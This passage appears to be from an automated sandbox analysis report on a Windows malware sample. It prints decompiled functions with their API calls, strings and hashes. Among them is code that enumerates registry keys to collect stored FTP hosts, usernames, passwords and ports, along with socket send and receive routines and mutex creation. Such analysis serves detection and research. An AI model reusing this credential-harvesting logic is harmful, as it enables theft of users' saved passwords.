				void* __esi;
				void* _t28;
				void* _t30;
				void* _t35;
				void* _t39;
				char* _t42;
				void* _t52;
				WCHAR* _t55;
				char* _t60;
				signed int _t61;
				void* _t62;
				intOrPtr _t70;

				_t54 = __edx;
				_t52 = __ecx;
				E00406F38( &_v12,  &_v12, 0, 8);
				_t28 = 0x77;
				E00405B00(_t28,  &_v120);
				_t30 = 0x78;
				E00405B00(_t30,  &_v44);
				_t55 =  &_v644;
				_t35 = E0040AFA9(0x80000001, _t52, _t55,  &_v120,  &_v44, 0x104);
				if(_t35 != 0xffffffff) {
					_t65 = _t35;
					if(_t35 > 0) {
						ExpandEnvironmentStringsW(_t55,  &_v1164, 0x104);
						E004186AC(_t65,  &_v1164,  &_v12);
					}
				}
				if(_v8 != 0) {
					L9:
					if(_t70 <= 0) {
						return E00406E85(_v12);
					}
					_push(0xcb);
					return E00416CBC(_t54, _v12, 0x7a);
				} else {
					_t60 =  &_v68;
					_t39 = 0x79;
					E00405B00(_t39, _t60);
					_v28 = 0x1a;
					_v24 = 0x26;
					_v20 = 0x23;
					_v16 = _t60;
					_t61 = 0;
					do {
						_t42 =  &_v644;
						__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t62 + _t61 * 4 - 0x18)), 0, 0, _t42);
						_t68 = _t42;
						if(_t42 == 0) {
							_t54 =  &_v16;
							E0040C5AE( &_v644,  &_v16, _t68, 1, 2, E004186E4,  &_v12, 0, 0, 0);
						}
						_t61 = _t61 + 1;
					} while (_t61 < 3);
					_t70 = _v8;
					goto L9;
				}
			}

0x00418909
0x00418909
0x0041891e
0x00418928
0x00418929
0x00418933
0x00418934
0x00418947
0x00418952
0x0041895a
0x0041895c
0x0041895e
0x0041896b
0x0041897c
0x0041897c
0x0041895e
0x00418984
0x004189ec
0x004189ec
0x00000000
0x00418a03
0x004189f1
0x00000000
0x00418986
0x00418988
0x0041898b
0x0041898c
0x00418993
0x0041899a
0x004189a1
0x004189a8
0x004189ab
0x004189ad
0x004189ad
0x004189bb
0x004189c1
0x004189c3
0x004189d5
0x004189de
0x004189de
0x004189e3
0x004189e4
0x004189e9
0x00000000
0x004189e9

APIs

Part of subcall function 0040AFA9: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00413CB1,?,?,00000104,.exe,00000000), ref: 0040AFBE

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 0041896B
SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 004189BB

Strings

&, xrefs: 0041899A
#, xrefs: 004189A1

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentExpandFolderOpenPathStrings
String ID: #$&
API String ID: 1994525040-3870246384
Opcode ID: f47c1f37de6d31b88ca5a77e3bfa8115f4afa7e07e86afa6e07b4836c43027aa
Instruction ID: 08f2167ec089f64063c422d4dd84e6fc0d0b577a513657c0253e44c789e9ade1
Opcode Fuzzy Hash: f47c1f37de6d31b88ca5a77e3bfa8115f4afa7e07e86afa6e07b4836c43027aa
Instruction Fuzzy Hash: 4D312DB2D00218ABDF10EAA19C89BDFB77CEB04314F50456AF605B7180DA78AA858B95

Uniqueness

Uniqueness Score: -1.00%

Function 0040B4DE, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E0040B4DE(void* __ecx, intOrPtr _a4, intOrPtr _a12, signed char _a16) {
				signed int _v14;
				signed int _v16;
				signed int _v20;
				char _v284;
				unsigned int _t24;
				void* _t26;
				signed int _t28;
				signed int* _t29;
				void* _t30;
				void* _t41;
				char* _t42;
				void* _t45;
				signed int _t46;
				void* _t47;

				_t45 = __ecx;
				_t24 = E00406EC1( &_v20, _a4, 0x10);
				_v20 = _v20 ^ _t24;
				_v16 = _v16 ^ _t24;
				_v14 = _v14 ^ _t24 >> 0x00000010;
				_t41 = 0;
				_t26 = 0;
				do {
					_t10 = _t26 + 0xc; // 0x423be0
					 *(_t47 + _t41 - 8) =  *(_t47 + _t41 - 8) ^  *(_t47 + _t10);
					_t26 = _t26 + 1;
					if(_t26 == 4) {
						_t26 = 0;
					}
					_t41 = _t41 + 1;
				} while (_t41 < 8);
				if(_a12 != 0) {
					E00406EC1( &_v284, _a12, 0x102);
					E00408301( &_v284, _t41,  &_v20, 0x10);
				}
				_t28 = _a16 & 0x000000ff;
				if(_t28 != 0) {
					_t30 = _t28 - 1;
					if(_t30 == 0) {
						_t42 = L"Local\\";
						_push(6);
						goto L11;
					} else {
						if(_t30 == 1) {
							_t42 = L"Global\\";
							_push(7);
							L11:
							_pop(_t46);
							E00407226(_t46, _t42, _t45);
							_t45 = _t45 + _t46 * 2;
						}
					}
				}
				_t29 =  &_v20;
				__imp__StringFromGUID2(_t29, _t45, 0x28);
				return _t29;
			}

0x0040b4ee
0x0040b4f4
0x0040b4f9
0x0040b4fc
0x0040b503
0x0040b507
0x0040b509
0x0040b50b
0x0040b50b
0x0040b50f
0x0040b513
0x0040b517
0x0040b519
0x0040b519
0x0040b51b
0x0040b51c
0x0040b525
0x0040b536
0x0040b547
0x0040b547
0x0040b550
0x0040b553
0x0040b555
0x0040b556
0x0040b564
0x0040b569
0x00000000
0x0040b558
0x0040b559
0x0040b55b
0x0040b560
0x0040b56b
0x0040b56b
0x0040b570
0x0040b575
0x0040b575
0x0040b559
0x0040b556
0x0040b57b
0x0040b57f
0x0040b588

APIs

StringFromGUID2.OLE32(00000000,?,00000028,00412EC2,?,00000010,00000000,77E49EB0), ref: 0040B57F

Strings

;B, xrefs: 0040B50B
Local\, xrefs: 0040B564
Global\, xrefs: 0040B55B

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: FromString
String ID: Global\$Local\$;B
API String ID: 1694596556-4134033513
Opcode ID: e61190de77119042c766145c21aa93403aa5197c43ce3ffca9266a9beb16b272
Instruction ID: 01b90f58167b147092af1e5f74f47e7942fe8303c30a6ad3348b0d7ad8f56d2e
Opcode Fuzzy Hash: e61190de77119042c766145c21aa93403aa5197c43ce3ffca9266a9beb16b272
Instruction Fuzzy Hash: 7F11D33161021D76CB14EA749C46BEF3669EB84718F00487BE642F61C2DB78D545C798

Uniqueness

Uniqueness Score: -1.00%

Function 0040A081, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,00000400,00000000), ref: 0040A0CA
send.WS2_32(?,?,00000000,00000000), ref: 0040A0E4
select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 0040A121

Strings

BAA, xrefs: 0040A081

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: recvselectsend
String ID: BAA
API String ID: 3514348486-1692831742
Opcode ID: 7af4f63d6b245769a6f83c6002ac69b70b833789f3732db2dc9a4bfefb05f1ee
Instruction ID: e3d4dbd0b5512c811717bb275af4da5413865935b36292ef6e799f9a055dcdf4
Opcode Fuzzy Hash: 7af4f63d6b245769a6f83c6002ac69b70b833789f3732db2dc9a4bfefb05f1ee
Instruction Fuzzy Hash: 06114CB181022CDBDB20DF25DC84ADE7BB8FF49344F20447AF929E6251D2349995CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040D9C1, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D9C1(void* __edx) {
				void _v108;
				char _v120;
				char _v212;
				long _v216;
				char _v224;
				void* __esi;
				void* _t8;
				void* _t16;

				_t16 = __edx;
				_t8 = GetThreadDesktop(GetCurrentThreadId());
				if(_t8 != 0) {
					_t8 = GetUserObjectInformationW(_t8, 2,  &_v108, 0x64,  &_v216);
					if(_t8 != 0 && _v216 == 0x4e) {
						E00412E8D(0x2937498d,  &_v212, 0);
						_t8 = E00406EF6( &_v224,  &_v120, 0x4c);
						if(_t8 == 0) {
							_t8 = E0040D5CF( &_v120, _t16, 0x4231b8, _t8);
							if(_t8 == 0) {
								_t8 = E0040D83A(0x4231b8, 0);
							} else {
								 *0x423968 =  *0x423968 | 0x00000004;
							}
						}
					}
				}
				return _t8;
			}

0x0040d9c1
0x0040d9d5
0x0040d9dd
0x0040d9ee
0x0040d9f6
0x0040da0b
0x0040da1a
0x0040da21
0x0040da29
0x0040da30
0x0040da3f
0x0040da32
0x0040da32
0x0040da32
0x0040da30
0x0040da21
0x0040d9f6
0x0040da48

APIs

GetCurrentThreadId.KERNEL32 ref: 0040D9CE
GetThreadDesktop.USER32(00000000), ref: 0040D9D5
GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 0040D9EE

Part of subcall function 0040D5CF: TlsAlloc.KERNEL32(004231B8,00000000,0000018C,00000000,00000000), ref: 0040D5E8

Strings

N, xrefs: 0040D9F8

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$AllocCurrentDesktopInformationObjectUser
String ID: N
API String ID: 454308152-1130791706
Opcode ID: 0f629252020cd7f76892a2f868443aac1dbe95d9d994d70c1d7fccd809677395
Instruction ID: 1c47e606b4b6456df72484a55138eb678d4eb6f8ef597733ed7407afa94f563b
Opcode Fuzzy Hash: 0f629252020cd7f76892a2f868443aac1dbe95d9d994d70c1d7fccd809677395
Instruction Fuzzy Hash: 67018871A04300ABE610EBA5DD06FA7379D5B84718F00413AB659B25D0EBB8D909CA5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040C48C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C48C(WCHAR* _a4) {
				signed int _t4;
				short _t9;
				signed short _t10;
				WCHAR* _t11;
				WCHAR* _t12;
				int _t18;

				_t12 = _a4;
				_t9 = 0;
				_t11 = PathSkipRootW(_t12);
				if(_t11 == 0) {
					_t11 = _t12;
				}
				while(1) {
					_t4 =  *_t11 & 0x0000ffff;
					if(_t4 == 0x5c || _t4 == 0x2f || _t4 == 0) {
						goto L5;
					}
					L11:
					_t11 =  &(_t11[1]);
					continue;
					L5:
					_t10 = _t4;
					 *_t11 = 0;
					if(GetFileAttributesW(_t12) == 0xffffffff) {
						_t18 = CreateDirectoryW(_t12, 0);
					}
					if(_t18 == 0) {
						L13:
						return _t9;
					} else {
						if(_t10 == 0) {
							_t9 = 1;
							goto L13;
						}
						 *_t11 = _t10;
						goto L11;
					}
				}
			}

0x0040c48e
0x0040c495
0x0040c49d
0x0040c4a1
0x0040c4a3
0x0040c4a3
0x0040c4a5
0x0040c4a5
0x0040c4ab
0x00000000
0x00000000
0x0040c4e3
0x0040c4e3
0x00000000
0x0040c4b7
0x0040c4b7
0x0040c4bc
0x0040c4c8
0x0040c4d3
0x0040c4d3
0x0040c4d9
0x0040c4ed
0x0040c4f0
0x0040c4db
0x0040c4de
0x0040c4e8
0x00000000
0x0040c4e8
0x0040c4e0
0x00000000
0x0040c4e0
0x0040c4d9

APIs

PathSkipRootW.SHLWAPI(?,.exe,00000000,?,00000000,0041640A,?,?,?,?,?), ref: 0040C497
GetFileAttributesW.KERNEL32(?,?,00000000,0041640A,?,?,?,?,?), ref: 0040C4BF
CreateDirectoryW.KERNEL32(?,00000000,?,00000000,0041640A,?,?,?,?,?), ref: 0040C4CD

Strings

.exe, xrefs: 0040C493

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesCreateDirectoryFilePathRootSkip
String ID: .exe
API String ID: 4231520044-4119554291
Opcode ID: 30d2ca4e508780e5b6a2a06e1992aa803ca3e272bf9a7735cc5b3fe25cbd1a64
Instruction ID: 9049e3a1fbae738a6b1703180ac3eec5449e3fe5019c118214248ff4a113d21f
Opcode Fuzzy Hash: 30d2ca4e508780e5b6a2a06e1992aa803ca3e272bf9a7735cc5b3fe25cbd1a64
Instruction Fuzzy Hash: 3BF02232140200EAD6300F290DA46777398BEA17A0B660B37EC90F33E0DA389C40827C

Uniqueness

Uniqueness Score: -1.00%

Function 0040C28A, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040C28A(WCHAR* _a4) {
				short _v524;
				char _v1044;
				void* __edi;
				void* _t11;
				void* _t19;
				void* _t20;

				if(GetTempPathW(0xf6,  &_v524) - 1 > 0xf5) {
					L6:
					return 0;
				}
				_t19 = 0;
				while(1) {
					_push(E004081BE());
					_push(L"tmp");
					_t18 =  &_v1044;
					_t11 = E00407B78(_t10, 0x104,  &_v1044, L"%s%08x");
					_t20 = _t20 + 0xc;
					if(_t11 == 0xffffffff) {
						goto L6;
					}
					if(E0040C70A(_t18, _a4,  &_v524) == 0 || CreateDirectoryW(_a4, 0) == 0) {
						_t19 = _t19 + 1;
						if(_t19 < 0x64) {
							continue;
						}
						goto L6;
					} else {
						return 1;
					}
				}
				goto L6;
			}

0x0040c2ad
0x0040c303
0x00000000
0x0040c303
0x0040c2af
0x0040c2b1
0x0040c2b6
0x0040c2b7
0x0040c2c6
0x0040c2cc
0x0040c2d1
0x0040c2d7
0x00000000
0x00000000
0x0040c2ec
0x0040c2fd
0x0040c301
0x00000000
0x00000000
0x00000000
0x0040c30b
0x00000000
0x0040c30b
0x0040c2ec
0x00000000

APIs

GetTempPathW.KERNEL32(000000F6,?), ref: 0040C2A1

Part of subcall function 004081BE: GetTickCount.KERNEL32 ref: 004081BE

Part of subcall function 0040C70A: PathCombineW.SHLWAPI(?,)A,?,00412909,?,?), ref: 0040C729

CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 0040C2F3

Strings

%s%08x, xrefs: 0040C2BC
tmp, xrefs: 0040C2B7

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Path$CombineCountCreateDirectoryTempTick
String ID: %s%08x$tmp
API String ID: 1218007593-1196434543
Opcode ID: c84471fab4558b353e01fe296ca2dba3525030606b35f410de4c8cdffa9169d3
Instruction ID: 12095dfc34da09a0661415c5aec57c7a61d0110a29d7891e8ae128f0a209de75
Opcode Fuzzy Hash: c84471fab4558b353e01fe296ca2dba3525030606b35f410de4c8cdffa9169d3
Instruction Fuzzy Hash: F6F044B2500218A7CA2067608C89BEF33589B41354F204273FE51F21E1C6788DC6DA9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040868C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040868C(void* __ecx) {
				signed int _v8;
				struct HINSTANCE__* _t7;

				_v8 = _v8 & 0x00000000;
				_t7 = GetModuleHandleW(L"kernel32.dll");
				if(_t7 == 0) {
					L4:
					return _t7 & 0xffffff00 | _v8 != 0x00000000;
				} else {
					_t7 = GetProcAddress(_t7, "IsWow64Process");
					if(_t7 == 0) {
						goto L4;
					} else {
						_t7 = _t7->i(0xffffffff,  &_v8);
						if(_t7 != 0) {
							goto L4;
						} else {
							return 0;
						}
					}
				}
			}

0x00408690
0x00408699
0x004086a1
0x004086c3
0x004086cb
0x004086a3
0x004086a9
0x004086b1
0x00000000
0x004086b3
0x004086b9
0x004086bd
0x00000000
0x004086bf
0x004086c2
0x004086c2
0x004086bd
0x004086b1

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,?,0041277F,00000000,00412CA6), ref: 00408699
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 004086A9

Strings

IsWow64Process, xrefs: 004086A3
kernel32.dll, xrefs: 00408694

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: IsWow64Process$kernel32.dll
API String ID: 1646373207-3024904723
Opcode ID: 6955bc413d98553728bce404bd2049e4d78f9975bbd523fa6a7063b3c6f5eb07
Instruction ID: 5aa98a578e9e261dd090957b2479961d77da9e30dbe8e48fec594bb37412b45a
Opcode Fuzzy Hash: 6955bc413d98553728bce404bd2049e4d78f9975bbd523fa6a7063b3c6f5eb07
Instruction Fuzzy Hash: 87E04F70250205BBEF0097A59F0AF6F73A89B517D9F2546BDA011F22E0EFB8DA14952C

Uniqueness

Uniqueness Score: -1.00%

Function 0041C4BF, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041C4BF(intOrPtr _a4, intOrPtr _a12) {
				void* __esi;
				void* _t6;
				signed int _t7;

				if(_a12 == 0x64 || _a12 == 0x33) {
					EnterCriticalSection(0x424004);
					_t7 = E0041BE86(_a4);
					if(_t7 != 0xffffffff) {
						_t7 = SetEvent( *(_t7 * 0x24 +  *0x42401c + 4));
					}
					LeaveCriticalSection(0x424004);
					return _t7;
				}
				return _t6;
			}

0x0041c4c4
0x0041c4d5
0x0041c4df
0x0041c4e7
0x0041c4f6
0x0041c4f6
0x0041c4fd
0x00000000
0x0041c504
0x0041c505

APIs

EnterCriticalSection.KERNEL32(00424004), ref: 0041C4D5
SetEvent.KERNEL32(?), ref: 0041C4F6
LeaveCriticalSection.KERNEL32(00424004), ref: 0041C4FD

Strings

3, xrefs: 0041C4C6

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterEventLeave
String ID: 3
API String ID: 3094578987-1842515611
Opcode ID: 5418bf1c34a970e43d33bccf63eef3d25c5895d6b75b367a9d59cbcd143eb95f
Instruction ID: be7807d9b72e9b3771c61d8ae6f8fa5805568c06e81b5af38ab4d693f4541d2e
Opcode Fuzzy Hash: 5418bf1c34a970e43d33bccf63eef3d25c5895d6b75b367a9d59cbcd143eb95f
Instruction Fuzzy Hash: AAE09231104100EFC7206B25AC888AB7764EBD5335701C53EF11AF2170C738D892DE2E

Uniqueness

Uniqueness Score: -1.00%

Function 004190D8, Relevance: 6.2, APIs: 4, Instructions: 184
registryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004190D8(char* __ecx, void* __edx, void* __eflags) {
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				int _v20;
				int _v24;
				intOrPtr _v28;
				char _v32;
				char* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v68;
				char _v88;
				char _v108;
				char _v132;
				char _v172;
				short _v260;
				short _v780;
				void* __edi;
				void* __esi;
				intOrPtr _t65;
				intOrPtr _t92;
				int _t104;
				void* _t110;
				intOrPtr _t112;
				void* _t115;
				int _t120;
				void* _t125;
				void* _t132;
				void* _t135;
				void* _t136;

				_t119 = __edx;
				_t118 = __ecx;
				_t120 = 0;
				E00406F38( &_v32,  &_v32, 0, 8);
				_t65 = E00406E55(0xc1c);
				_v16 = _t65;
				if(_t65 == 0) {
					L22:
					if(_v28 <= _t120) {
						return E00406E85(_v32);
					}
					return E00416CBC(_t119, _v32, 0xcb);
				} else {
					_v36 = _t65 + 0x3fc;
					_v48 = 0x80000001;
					_v44 = 0x80000002;
					E00405B00(0x8a,  &_v260);
					E00405B00(0x8b,  &_v88);
					E00405B00(0x8c,  &_v132);
					E00405B00(0x8d,  &_v68);
					E00405B00(0x8e,  &_v108);
					_v12 = 0;
					do {
						if(RegOpenKeyExW( *(_t135 + _v12 * 4 - 0x2c),  &_v260, _t120, 8,  &_v8) != 0) {
							goto L20;
						}
						_v24 = _t120;
						_v20 = 0x104;
						if(RegEnumKeyExW(_v8, _t120,  &_v780,  &_v20, _t120, _t120, _t120, _t120) != 0) {
							L19:
							RegCloseKey(_v8);
							goto L20;
						} else {
							goto L4;
						}
						L17:
						_v20 = 0x104;
						if(RegEnumKeyExW(_v8, _v24,  &_v780,  &_v20, 0, 0, 0, 0) == 0) {
							L4:
							_t122 = _v16;
							_v24 = _v24 + 1;
							_t92 = E0040AFA9(_v8, _t118, _v16,  &_v780,  &_v88, 0xff);
							_v40 = _t92;
							if(_t92 != 0xffffffff && _t92 != 0) {
								_t132 = E0040AFA9(_v8, _t118, _t122 + 0x1fe,  &_v780,  &_v68, 0xff);
								if(_t132 != 0xffffffff && _t132 != 0) {
									_t124 = _v36;
									_t104 = E0040AFA9(_v8, _t118, _v36,  &_v780,  &_v108, 0xff);
									_v20 = _t104;
									if(_t104 != 0xffffffff && _t104 != 0 && E0041901E(_t119, _t124, _t132 + _v40) > 0) {
										_t125 = E0040B05F(_v8, _t118,  &_v780,  &_v132);
										if(_t125 < 1 || _t125 > 0xffff) {
											_t125 = 0x15;
										}
										_t134 =  &_v172;
										_t110 = 0x55;
										E00405B00(_t110,  &_v172);
										_t112 = _v16;
										_t118 = _v36;
										_push(_t125);
										_push(_t112);
										_push(_t118);
										_push(_t112 + 0x1fe);
										_t119 = 0x311;
										_t126 = _t118 + 0x1fe;
										_t115 = E00407B78(_t134, 0x311, _t118 + 0x1fe, _t134);
										_t136 = _t136 + 0x14;
										if(_t115 > 0) {
											_t118 =  &_v32;
											if(E00407279(_t115,  &_v32, _t126) != 0) {
												_v28 = _v28 + 1;
											}
										}
									}
								}
							}
							goto L17;
						} else {
							_t120 = 0;
							goto L19;
						}
						L20:
						_v12 = _v12 + 1;
					} while (_v12 < 2);
					E00406E85(_v16);
					goto L22;
				}
			}

0x004190d8
0x004190d8
0x004190e6
0x004190ed
0x004190f7
0x004190fc
0x00419101
0x004192fa
0x004192fd
0x00000000
0x00419316
0x00000000
0x00419107
0x0041910c
0x0041911a
0x00419121
0x00419128
0x00419135
0x00419142
0x0041914f
0x0041915c
0x00419161
0x00419169
0x00419186
0x00000000
0x00000000
0x0041919f
0x004191a2
0x004191b1
0x004192dc
0x004192df
0x00000000
0x00000000
0x00000000
0x00000000
0x004192ae
0x004192c2
0x004192d4
0x004191b7
0x004191b7
0x004191ba
0x004191cc
0x004191d1
0x004191d7
0x004191ff
0x00419204
0x00419212
0x00419224
0x00419229
0x0041922f
0x00419255
0x0041925a
0x00419266
0x00419266
0x00419269
0x0041926f
0x00419270
0x00419275
0x00419278
0x0041927b
0x0041927c
0x0041927d
0x00419283
0x00419287
0x0041928c
0x00419292
0x00419297
0x0041929c
0x0041929f
0x004192a9
0x004192ab
0x004192ab
0x004192a9
0x0041929c
0x0041922f
0x00419204
0x00000000
0x004192da
0x004192da
0x00000000
0x004192da
0x004192e5
0x004192e5
0x004192e8
0x004192f5
0x00000000
0x004192f5

APIs

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008,?,00000000,00000001), ref: 0041917E
RegEnumKeyExW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000001), ref: 004191A9
RegCloseKey.ADVAPI32(?,?,00000000,00000001), ref: 004192DF

Part of subcall function 0040AFA9: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00413CB1,?,?,00000104,.exe,00000000), ref: 0040AFBE

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF,?,00000000,00000001), ref: 004192CC

Part of subcall function 0040AFA9: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00413CB1,?,?,00000104), ref: 0040B03F

Part of subcall function 0040B05F: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,0041C096,?,?), ref: 0040B077

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Open$Enum$CloseEnvironmentExpandStrings
String ID:
API String ID: 2343474859-0
Opcode ID: 117492efded0cd78d0230f3ed43cdd9a8c02b29fbf8a94dc3de29487422afe26
Instruction ID: ed80c876cb093f7161c0c67ba62946e9932b22c6b5c05f5abd05f6927040e911
Opcode Fuzzy Hash: 117492efded0cd78d0230f3ed43cdd9a8c02b29fbf8a94dc3de29487422afe26
Instruction Fuzzy Hash: BB515C72D00219ABDB10EB95CD55AEFB7BCEB48304F100576E915F3291DB38AE858B64

Uniqueness

Uniqueness Score: -1.00%

Function 0041966C, Relevance: 6.2, APIs: 4, Instructions: 176
registryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0041966C(char* __ecx, void* __eflags) {
				void* _v8;
				int _v12;
				intOrPtr _v16;
				int* _v20;
				intOrPtr _v24;
				char _v28;
				char* _v32;
				char _v40;
				char _v52;
				char _v64;
				char _v76;
				char _v116;
				short _v180;
				short _v700;
				void* __edi;
				void* __esi;
				intOrPtr _t55;
				int _t81;
				int _t89;
				int _t93;
				void* _t99;
				intOrPtr _t101;
				void* _t104;
				int* _t109;
				char* _t113;
				void* _t114;
				void* _t122;

				_t107 = __ecx;
				_t109 = 0;
				E00406F38( &_v28,  &_v28, 0, 8);
				_t55 = E00406E55(0xc1c);
				_v16 = _t55;
				if(_t55 == 0) {
					return _t55;
				}
				_v32 = _t55 + 0x3fc;
				E00405B00(0x97,  &_v180);
				E00405B00(0x98,  &_v64);
				E00405B00(0x99,  &_v76);
				E00405B00(0x9a,  &_v52);
				E00405B00(0x9b,  &_v40);
				if(RegOpenKeyExW(0x80000001,  &_v180, 0, 8,  &_v8) != 0) {
					L20:
					E00406E85(_v16);
					if(_v24 <= _t109) {
						return E00406E85(_v28);
					}
					return E00416CBC(0x311, _v28, 0xcb);
				}
				_v20 = 0;
				_v12 = 0x104;
				if(RegEnumKeyExW(_v8, 0,  &_v700,  &_v12, 0, 0, 0, 0) != 0) {
					L19:
					RegCloseKey(_v8);
					goto L20;
				} else {
					do {
						_t111 = _v16;
						_v20 = _v20 + 1;
						_t81 = E0040AFA9(_v8, _t107, _v16,  &_v700,  &_v64, 0xff);
						_v12 = _t81;
						if(_t81 != 0xffffffff && _t81 != 0) {
							_t89 = E0040AFA9(_v8, _t107, _t111 + 0x1fe,  &_v700,  &_v52, 0xff);
							_v12 = _t89;
							if(_t89 != 0xffffffff && _t89 != 0) {
								_t113 = _v32;
								_t93 = E0040AFA9(_v8, _t107, _t113,  &_v700,  &_v40, 0xff);
								_v12 = _t93;
								if(_t93 != 0xffffffff && _t93 != 0) {
									_t107 = _t113;
									if(E004079D4(_t113) > 0) {
										_t114 = E0040B05F(_v8, _t107,  &_v700,  &_v76);
										if(_t114 < 1 || _t114 > 0xffff) {
											_t114 = 0x15;
										}
										_t121 =  &_v116;
										_t99 = 0x55;
										E00405B00(_t99,  &_v116);
										_t101 = _v16;
										_t107 = _v32;
										_push(_t114);
										_push(_t101);
										_push(_t107);
										_push(_t101 + 0x1fe);
										_t115 = _t107 + 0x1fe;
										_t104 = E00407B78(_t121, 0x311, _t107 + 0x1fe, _t121);
										_t122 = _t122 + 0x14;
										if(_t104 > 0) {
											_t107 =  &_v28;
											if(E00407279(_t104,  &_v28, _t115) != 0) {
												_v24 = _v24 + 1;
											}
										}
									}
								}
							}
						}
						_v12 = 0x104;
					} while (RegEnumKeyExW(_v8, _v20,  &_v700,  &_v12, 0, 0, 0, 0) == 0);
					_t109 = 0;
					goto L19;
				}
			}

0x0041966c
0x0041967a
0x00419681
0x0041968b
0x00419690
0x00419695
0x0041988f
0x0041988f
0x004196a0
0x004196ae
0x004196bb
